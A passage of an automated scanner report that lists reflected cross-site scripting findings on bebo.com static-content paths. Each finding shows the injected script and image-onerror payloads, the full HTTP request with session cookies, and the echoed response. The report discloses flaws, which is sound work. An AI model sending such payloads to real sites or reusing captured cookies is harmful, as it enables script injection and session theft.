+lm6kNgTKV2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkXSeYP0Sa055Jowm8c3VOEyblQFx7TAFSHkDq5YarNx1BjiCNS5TIpkc8zWlMERLAj742CxFJcNA7+7bqXIMkedmLdIFCZB9EytlUUk2Wv+5bLxiGCvU7D9PKFK0AL+dBnINTfAdFFeU5V0gNWg/nmqkSauAt5gv+8Fxo2cwZVbGk7dnQQn+9n5+QszAAPIydnCTLTIgJ4G6WYBuM17MZz6TuczSP7tRbv0S09gMIBdvRMwHEvwOgpIicDjuJvV7gSa/6iqC+gbiIb4QzUGcNwnTPek2Koeo6DfiyyL0nr5ij0dsLecPRMQthM0F02MOgu97p3jdHjUYxxhUMCjWZrnvY3xKe82rO0/jh01TEEum7etTVKj1Hz0+cD/+xj2Ud6B13Kee6LMzJfe3vcmTgaFpPwrzNfhdidJDaqe3iFptr/Hp6twVrFJ2DsiW6qXQHtc+D6U6SEvc9WPty7qC6Ie8wPnBlXCc0ZAeAYZJZMMwoYL5cs0GfQ6aBsf25DOKI33YmUXvcil98AdDD6HQK3DBak/IHo+MavdGABKfVj7rLBjs8cdrHUY61ddS3N6dWWLk136nQxh5xSI7hSwFb0wt1JokhQDrLrmSqJn4Xwf2BZ6FCFjNAX/enZekmUzEJqNSouPjLLzPTYwTFEXtxV7oY+Jl1yyo9rDqrPQMS8SkT/MmRb2uBbNwnKCHvLCx2LIla1Kw8f4tNak2r5LZCZKtggTm/cFjaluhBUR9Uvnf8wfZzBjv+T7CNGGpiwzqsxRJQmgoQCeTBqs9ANTeuXsr5gyey1KwHhRC7JVzPR20HhlE+cJB3esBjEnQKtEa7viDXqBYPpVlIQYk33dE9HlH5W5ML4jItbdPYkX0HXuSp21yN/UNiPWzYoGS2ICl3/j2fKzxhWibA9Ga4eVS61QlrnZ0QapS5GW2WBwsuEqO6wJHYEU+LsvEk8Jhcu0MP2y5GIjqK0MdWo="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 06 Jul 2011 14:00:48 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 07 Jul 2011 14:00:48 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:47 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "K087846DA49<SCRIPT>ALERT(1)</SCRIPT>F1F0690E9F" was not recognized.
*/

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03 was submitted in the REST URL parameter 2. This input was echoed as ef1cd"><img src=a onerror=alert(1)>e91147b2c03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Siteef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14777
Date: Wed, 06 Jul 2011 11:22:11 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-siteef1cd"><img src=a onerror=alert(1)>e91147b2c03-_default" >
...[SNIP]...

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 292f7'><script>alert(1)</script>55c886dab8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site292f7'><script>alert(1)</script>55c886dab8f/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14694
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site292f7'><script>alert(1)</script>55c886dab8f/_default_css&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d56a'%3b4e37d154695 was submitted in the REST URL parameter 2. This input was echoed as 5d56a';4e37d154695 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site5d56a'%3b4e37d154695/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14483
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site5d56a';4e37d154695/_default.css/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('
...[SNIP]...

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18ffc<script>alert(1)</script>491fb71b12c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14676
Date: Wed, 06 Jul 2011 11:22:14 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css page, please try again.</div>
...[SNIP]...

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3141'><script>alert(1)</script>03a6132018e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site/_default.cssd3141'><script>alert(1)</script>03a6132018e?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14244
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site/_default_cssd3141'><script>alert(1)</script>03a6132018e&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f was submitted in the REST URL parameter 3. This input was echoed as af2df"><img src=a onerror=alert(1)>11c0a48793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Site/af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14267
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-af2df"><img src=a onerror=alert(1)>11c0a48793f" >
...[SNIP]...

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d42'%3b1c774af16d5 was submitted in the REST URL parameter 3. This input was echoed as a4d42';1c774af16d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site/_default.cssa4d42'%3b1c774af16d5?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14081
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site/_default.cssa4d42';1c774af16d5/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87eb8<script>alert(1)</script>fda742dfacd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:13 GMT
Content-Length: 14722
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js page, please try again.</div>
...[SNIP]...

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d8f'%3b5319fe373f was submitted in the REST URL parameter 2. This input was echoed as b2d8f';5319fe373f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/siteb2d8f'%3b5319fe373f/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:12 GMT
Content-Length: 14520
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/siteb2d8f';5319fe373f/index20_script.js/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleR
...[SNIP]...

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6 was submitted in the REST URL parameter 2. This input was echoed as 123b5"><img src=a onerror=alert(1)>3788d604ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 14823
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site123b5"><img src=a onerror=alert(1)>3788d604ea6-index20_script" >
...[SNIP]...

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 10a5d'><script>alert(1)</script>8dd8fd16174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Length: 14740
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script_js&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=nl'>
...[SNIP]...

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac75'%3be425e5815a9 was submitted in the REST URL parameter 3. This input was echoed as cac75';e425e5815a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/site/index20_script.jscac75'%3be425e5815a9?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14122
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
UT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/site/index20_script.jscac75';e425e5815a9/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10 was submitted in the REST URL parameter 3. This input was echoed as 694e4"><img src=a onerror=alert(1)>c97eeae1d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14278
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-694e4"><img src=a onerror=alert(1)>c97eeae1d10" >
...[SNIP]...

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
